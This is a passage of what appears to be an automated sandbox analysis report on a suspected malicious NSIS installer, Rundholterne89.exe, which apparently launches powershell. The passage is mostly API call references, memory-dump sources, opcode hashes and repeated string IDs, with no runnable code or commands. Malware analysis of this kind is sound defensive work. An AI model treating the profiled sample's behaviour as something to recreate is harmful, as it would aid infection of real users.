• Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
• Instruction Fuzzy Hash: 8ED0A762505D306BE21226155C09D8B2A08CF12740B044027F100B61E1C63C4D414FFD
APIs
• DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
• GetTickCount.KERNEL32 ref: 00402C33
• CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
• ShowWindow.USER32(00000000,00000005), ref: 00402C5E
Memory Dump Source
• Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps as listed above)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
• Opcode ID: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
• Instruction ID: 1b84634240e2166e3851fbc92cd381e461e1db94d3428fd6ef6110bf0b183a31
• Opcode Fuzzy Hash: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
• Instruction Fuzzy Hash: 97F05E30A09220EFD6317B20FE4CD9F7BA4BB04B15B404976F104B11EAC7782882CB9D
APIs
  • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Hermandas Setup,NSIS Error), ref: 00405D3C
  • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,774D3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
  • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
  • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
• lstrlenA.KERNEL32(0042AC70,00000000,0042AC70,0042AC70,774D3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E2
• GetFileAttributesA.KERNEL32(0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,00000000,0042AC70,0042AC70,774D3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,774D3410,C:\Users\user\AppData\Local\Temp\), ref: 004058F2
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 0040588F
Memory Dump Source
• Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps as listed above)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 3248276644-2145255484
APIs
• FreeLibrary.KERNEL32(?,774D3410,00000000,C:\Users\user\AppData\Local\Temp\,004035F2,0040340C,?), ref: 00403634
• GlobalFree.KERNEL32(00000000), ref: 0040363B
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 0040361A
Memory Dump Source
• Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
Similarity
• API ID: Free$GlobalLibrary
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 1100898210-2145255484
APIs
• lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Rundholterne89.exe,C:\Users\user\Desktop\Rundholterne89.exe,80000000,00000003), ref: 004057EE
• CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Rundholterne89.exe,C:\Users\user\Desktop\Rundholterne89.exe,80000000,00000003), ref: 004057FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
Similarity
• API ID: CharPrevlstrlen
• String ID: C:\Users\user\Desktop
• API String ID: 2709904686-3080008178
APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
• lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040592F
• CharNextA.USER32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405940
• lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
Memory Dump Source
• Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
Strings
Memory Dump Source
• Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
Similarity
• API ID:
• String ID: (fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm
• API String ID: 0-4263619562
Memory Dump Source
• Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Strings
Memory Dump Source
• Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
Similarity
• API ID:
• String ID: (fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm
• API String ID: 0-3978585136
Strings
Memory Dump Source
• Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
Similarity
• API ID:
• String ID: (fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm
• API String ID: 0-3189741695
Strings
Memory Dump Source
• Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
Similarity
• API ID:
• String ID: (fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm
• API String ID: 0-3050064299
Strings
Memory Dump Source
• Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
Similarity
• API ID:
• String ID: (fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm$(fm
• API String ID: 0-4000324069
Strings
Memory Dump Source
• Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
Similarity
• API ID:
• String ID: (fm$(fm$(fm$(fm$(fm
• API String ID: 0-656800924
Strings
Memory Dump Source
• Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
Similarity
• API ID:
• String ID: (fm$(fm$(fm$(fm$(fm
• API String ID: 0-656800924
Strings
Memory Dump Source
• Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
Similarity
• API ID:
• String ID: (fm$(fm
• API String ID: 0-231707147
Strings
Memory Dump Source
• Source File: 00000002.00000002.1886502430.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_87e0000_powershell.jbxd
Similarity
• API ID:
• String ID: (fm$(fm
• API String ID: 0-231707147
                                                                                            • Opcode ID: f82e82dc86ec01b13cc8fe1226bfe67230d803a1ab5477f558dbb3a6804aad90
                                                                                            • Instruction ID: 82b94002cdf45b8f1b4983fe4a22238bdb8a4f5cbbb1e0ddc05e6cda959c6638
                                                                                            • Opcode Fuzzy Hash: f82e82dc86ec01b13cc8fe1226bfe67230d803a1ab5477f558dbb3a6804aad90
                                                                                            • Instruction Fuzzy Hash: 6432C635B00204DFEB24CB64C455BAABBF2AF8D612F5580AAE4169F356DB31DC41CBB1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fm$(fm
                                                                                            • API String ID: 0-231707147
                                                                                            • Opcode ID: 58f6b2036fbd0b53ff5671442e834277e436d30e6a4b22dbdd3f6eb403103fe6
                                                                                            • Instruction ID: f41de683e56124efb7a3827e19eda7b52719f1d07454e06de9c47866ac2b23e6
                                                                                            • Opcode Fuzzy Hash: 58f6b2036fbd0b53ff5671442e834277e436d30e6a4b22dbdd3f6eb403103fe6
                                                                                            • Instruction Fuzzy Hash: CBE19134F00209DFEB54DBA4C464BAEBBF2AF89310F258069D5056F396CB75EC428B95
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fm
                                                                                            • API String ID: 0-3245611568
                                                                                            • Opcode ID: 85e36da75f6dc05874b0e30d26d9c202a3c852a1071ce3269b753d0a4f2ac8e4
                                                                                            • Instruction ID: c1b39ec1193d2b774725ea24fe2240e68ce08ed329ecfd1ada31bb1b523ac179
                                                                                            • Opcode Fuzzy Hash: 85e36da75f6dc05874b0e30d26d9c202a3c852a1071ce3269b753d0a4f2ac8e4
                                                                                            • Instruction Fuzzy Hash: 8B227F74A00345DFEB54CB94C454BA9BBB2BB89314F25C0ADE9199F352CB72EC42CB91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1886502430.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_87e0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fm
                                                                                            • API String ID: 0-3245611568
                                                                                            • Opcode ID: 7c4f7b07e1e9f98331ecc990eb5cf66a87456a20ee60c70c5156d5aa0f127fc6
                                                                                            • Instruction ID: f1f78d720354826f5d41ffaa4765c00a7af4a80826653d05f5f7404f95d14765
                                                                                            • Opcode Fuzzy Hash: 7c4f7b07e1e9f98331ecc990eb5cf66a87456a20ee60c70c5156d5aa0f127fc6
                                                                                            • Instruction Fuzzy Hash: 8B812E74A00204DFDB14CF54C595E9ABBB2EF8C316F558199E819AB365CB32EC81CBB1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5e3566a7807966384a2024a82239d4a7dd15236ffc63f453e2eea14550639a29
                                                                                            • Instruction ID: b8863fdc2ae29b0693225bfca150653d1364ecd4118fc472d670d491ca8bee30
                                                                                            • Opcode Fuzzy Hash: 5e3566a7807966384a2024a82239d4a7dd15236ffc63f453e2eea14550639a29
                                                                                            • Instruction Fuzzy Hash: 49726175A01344DFEB54CB94C450BA9BBB2BB49314F2580ADE9096F392CB72ED42CF91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ffff391a6197adfff014a578e07b022d10eea953135497794c5b388474f1a7b1
                                                                                            • Instruction ID: d46b3c5d9e3225740221d8607e33856c34e7efc104de2d475ac90591b300bb51
                                                                                            • Opcode Fuzzy Hash: ffff391a6197adfff014a578e07b022d10eea953135497794c5b388474f1a7b1
                                                                                            • Instruction Fuzzy Hash: 99123C31F0431A9FE7658B688800F6ABFA2AFC5220F14847ED546DF292DF71C841D7A6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9f4ef048b8afad607cb1ed5aa42d9536eec646e2150224fc9a86b9ea76898c15
                                                                                            • Instruction ID: 30c00d1a39451701e0692be476c2123d42f600d57f8ca6c532f8831ff465b02b
                                                                                            • Opcode Fuzzy Hash: 9f4ef048b8afad607cb1ed5aa42d9536eec646e2150224fc9a86b9ea76898c15
                                                                                            • Instruction Fuzzy Hash: 0E326274B012199FF754CB98C854F6ABBF2AF85714F1480A9E505AF392CB72EC42CB91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1886537386.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 43049cc204c09870bf3478e6018f55ffc03b2daa240ccf080c62e0deec24c2f9
                                                                                            • Instruction ID: bae5c49eedecfeeb11991d45b684c013eea401a9c888999da04ea321a70fbfac
                                                                                            • Opcode Fuzzy Hash: 43049cc204c09870bf3478e6018f55ffc03b2daa240ccf080c62e0deec24c2f9
                                                                                            • Instruction Fuzzy Hash: E4023074A00609DFDB15CF59D884A9DBBB2FF88310F248169E905AB366C771EC81CFA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 451d969ec53f9070a3f69658db1eb52980a99fdd302fa2dbd4d5bcc33013b2b9
                                                                                            • Instruction ID: 57e30763d28f5fe868fc4bf8ee37eb29e09ae65056bff10a13f2dd58c7ed2f7d
                                                                                            • Opcode Fuzzy Hash: 451d969ec53f9070a3f69658db1eb52980a99fdd302fa2dbd4d5bcc33013b2b9
                                                                                            • Instruction Fuzzy Hash: 77912D31B0031EAFEB659B69C44477ABBA5AFC4320F24846DD846EB392DB31DD41C7A1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 70f92749fa3d24fd044f5a9d09cea59665df282adeb8db909851e445d01f86fa
                                                                                            • Instruction ID: cd5e9b9aaf32ed40ff7fbd5441319219537ed0ec0512f1867d25d68263f90937
                                                                                            • Opcode Fuzzy Hash: 70f92749fa3d24fd044f5a9d09cea59665df282adeb8db909851e445d01f86fa
                                                                                            • Instruction Fuzzy Hash: 92A16E36A00208DFDB14DFA4E544AADBBB2FF84310F119559E806AF365DB74AD49CF80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cc83079725875d0f36357fbe7e75c96ad9b4a028529eaa06226e1bb982abca9c
                                                                                            • Instruction ID: d361cdc2c28d055591ab94bfe17409f511a8b8c14dbc20e55425616768354f2b
                                                                                            • Opcode Fuzzy Hash: cc83079725875d0f36357fbe7e75c96ad9b4a028529eaa06226e1bb982abca9c
                                                                                            • Instruction Fuzzy Hash: DC714C35B0825ADFEB609B6884103BBFBF1AFC9260F18847ED446DB242DB35D941C7A1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3702cbc112588a52d63c024e757c117d437a1cec98b436be7782124efece86c2
                                                                                            • Instruction ID: f97e1815c2ae905b4ae63416ab52f3d5f74fd4c43e4bd648f0da2f240c1c72bb
                                                                                            • Opcode Fuzzy Hash: 3702cbc112588a52d63c024e757c117d437a1cec98b436be7782124efece86c2
                                                                                            • Instruction Fuzzy Hash: FB710A35F0021ADFEB649B7988007AAB7A5AFC4220F24C56EC556EB341DB36D941C7E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5f8238083b554a27868bddd2edf7afa0ba6cb1ac0f2268b168deced541549eba
                                                                                            • Instruction ID: 12ec29c7a2b2c2193a378d93571753ff9a765583668902f9b433e48cbefaa3ce
                                                                                            • Opcode Fuzzy Hash: 5f8238083b554a27868bddd2edf7afa0ba6cb1ac0f2268b168deced541549eba
                                                                                            • Instruction Fuzzy Hash: 33919075A002058FCB15CF59D494AAEFBB1FF88310B248599D916AB3A5C736FC91CFA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1886537386.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0080d68e69476b9ec4ad006e996cb7b6734ad8d2d3bc1fd4d1d8911af4b4950d
                                                                                            • Instruction ID: 2c1670f46516263a3f0122fbad945eb80a275f1c12d12575085c10e2e29e689c
                                                                                            • Opcode Fuzzy Hash: 0080d68e69476b9ec4ad006e996cb7b6734ad8d2d3bc1fd4d1d8911af4b4950d
                                                                                            • Instruction Fuzzy Hash: 4B711B34A093C59FD707CB68C89499ABFB1EF46250B1941E6E841EB3A7C335DC46CBA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9d411b72d63f3634c2244336eea8018fbe1e0961fe674efab4c7304e6bb5903b
                                                                                            • Instruction ID: 14d597609ebcb2605a4da2450b3f8fd8288f7f0c02cd612d99b417b54d5204c3
                                                                                            • Opcode Fuzzy Hash: 9d411b72d63f3634c2244336eea8018fbe1e0961fe674efab4c7304e6bb5903b
                                                                                            • Instruction Fuzzy Hash: 33713831E00208DFDB15DFA5E484BADBBB2BF88304F149569E406AB7A0DB70AD45CB91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2cb50a54f0fffa42c97af1edd1bdf2308596b2cabd0e3a8f05757e56f64edc22
                                                                                            • Instruction ID: ea894fc558ff900a260bd0c05329fbf32cf3834bff1fa88054f816ed1600bde0
                                                                                            • Opcode Fuzzy Hash: 2cb50a54f0fffa42c97af1edd1bdf2308596b2cabd0e3a8f05757e56f64edc22
                                                                                            • Instruction Fuzzy Hash: 21619D31A003089FDB14DF69D884ADEBBB6FF84314F14C969D406AB791DB71AD46CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0e2c3247fba1e13e119f92bd220527929dbb2d04b3a763393752ac6f17ad2d9a
                                                                                            • Instruction ID: e6d4108f03aacdd6fd6d33024c643f1c53d4b95cf28255a87d70cf7c4fbcf7d6
                                                                                            • Opcode Fuzzy Hash: 0e2c3247fba1e13e119f92bd220527929dbb2d04b3a763393752ac6f17ad2d9a
                                                                                            • Instruction Fuzzy Hash: 43515831B0435ACFEB618BA9C80077ABBB6AF81621F14807FD545DB292C676C841C7B2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d3a9d7bef2961a778d14c48089cb2843255abbdccd30742a0d806905800fa787
                                                                                            • Instruction ID: 25ee6b2e87541565eb577bb80494defa8d8fa05bef16e6d79621e51aadb3d05b
                                                                                            • Opcode Fuzzy Hash: d3a9d7bef2961a778d14c48089cb2843255abbdccd30742a0d806905800fa787
                                                                                            • Instruction Fuzzy Hash: BB511C30A01309AFE7649B64C450B6ABBB56F84320F19846DD856EB393DB35DE41C7D1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1886537386.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ff09836188984c7c57d4ea3250c34db4a5f18caa6d9533202dfed37b945e83f4
                                                                                            • Instruction ID: 702927712bb8e4ea513df90db86c53cf90f13f2bc087065f8227c5fc026428ed
                                                                                            • Opcode Fuzzy Hash: ff09836188984c7c57d4ea3250c34db4a5f18caa6d9533202dfed37b945e83f4
                                                                                            • Instruction Fuzzy Hash: 6B515C30A05609DFCB15CF59C490AAEBBB2FF48311F648269EA15A73A5C735EC42CB60
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a8b83dee6aed250a39651b183d4e72bc0f2f6a5114a9695914bc638171c7ba9a
                                                                                            • Instruction ID: f3a489e174d72d70c074749c5d05327556f82df9aa3f096bdbd02cc1deb32b51
                                                                                            • Opcode Fuzzy Hash: a8b83dee6aed250a39651b183d4e72bc0f2f6a5114a9695914bc638171c7ba9a
                                                                                            • Instruction Fuzzy Hash: 41419A35A403048FDB15DB34D858AAA7BB7FF88754F098468E806EB7A0CB34AD41CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 972e8655eda0c72c73556a75434da2f165ee383ed073398c5a6c7b4651e27f0a
                                                                                            • Instruction ID: 6c9111afeac676765e813390f3d8512bf67fec7989638907183c6e22d45ba179
                                                                                            • Opcode Fuzzy Hash: 972e8655eda0c72c73556a75434da2f165ee383ed073398c5a6c7b4651e27f0a
                                                                                            • Instruction Fuzzy Hash: A7416034A002049FEB15DB75C494BAEBAF3EF88710F19C469D806AB755DB75AC418FA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a4da9b37e9adb713d337b2892279146d47b22fdf03c91263d3c4a031e3b3e908
                                                                                            • Instruction ID: af668e52b2441214875944472657822f949ac6637a606f7c1facb31d02302293
                                                                                            • Opcode Fuzzy Hash: a4da9b37e9adb713d337b2892279146d47b22fdf03c91263d3c4a031e3b3e908
                                                                                            • Instruction Fuzzy Hash: 7F411B71E00306DFEB64CF648800F7A7FB1AF85260B1984ADD9099B252DB35D942D7E2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1886537386.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 35164ee5baea29a2a1628c69e81d75091e1d4d990f6c752f4305632c4f58334d
                                                                                            • Instruction ID: 4f0dede9a140a207296cf84e4bc392b73bfa5e3f3389855b28e5655350fefe55
                                                                                            • Opcode Fuzzy Hash: 35164ee5baea29a2a1628c69e81d75091e1d4d990f6c752f4305632c4f58334d
                                                                                            • Instruction Fuzzy Hash: ED511B34A01609DFCB15CF59C484AAEB7B2FF88315F648628E916A73A5C731EC52CF60
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1886537386.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7d66bd0e7f1e709695f1f3eb093e04560cc5953494105dd00d034376e62968d3
